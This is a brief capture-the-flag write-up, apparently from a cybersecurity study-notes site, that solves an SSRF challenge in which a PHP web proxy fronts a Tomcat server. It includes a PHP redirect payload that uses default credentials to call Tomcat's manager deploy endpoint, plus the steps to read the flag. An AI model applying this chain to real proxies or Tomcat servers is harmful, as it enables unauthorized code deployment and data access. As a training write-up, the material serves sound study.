CTF Challenge Description:

The challenge contains a php webproxy and a Tomcat server which has the Tomcat manager app deployed andwas only accessible via the php webproxy.

https://github.com/Athlon1600/php-proxy-app is what is running in the php-proxycontainer and it has a few open issues, including some that look like they could be security-relevant.

Solution

To visit the tomcat container from the proxy, simply enter 127.0.0.1:8888 to view the tomcat webpage. Tomcat mentions an admin interface should be at /manager/html but upon visiting 127.0.0.1:8888/manager/html through the proxy we get a “401 unauthorized” error.

We also find the username and password (manager-web.xml) and that /manager/text exists as an interface for scripts.

We can use /manager/text/deploy to deploy the folder that contains the flag and visit that like any other webpage.

Cyber Security Study Notes

OSCP Study Notes

Then we can host this on our local attacker machine. The server address can be:

http://127.0.0.1:8000/test

<?PHP
Header('location: http://admin:admin@127.0.0.1:8888/manager/text/deploy?path=/foofour&war=file:/c9fdb1da2a41a453ae291a1fb5d2519701bc60f6');
?>
  1. Redirect the proxy to  http://127.0.0.1:8000/test
  2. Then redirect it to http://127.0.0.1:8888/foofour/flag.txt
  3. Flag: INS{SSRF-As-A-Service}

CTF Walkthrough Playlist

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles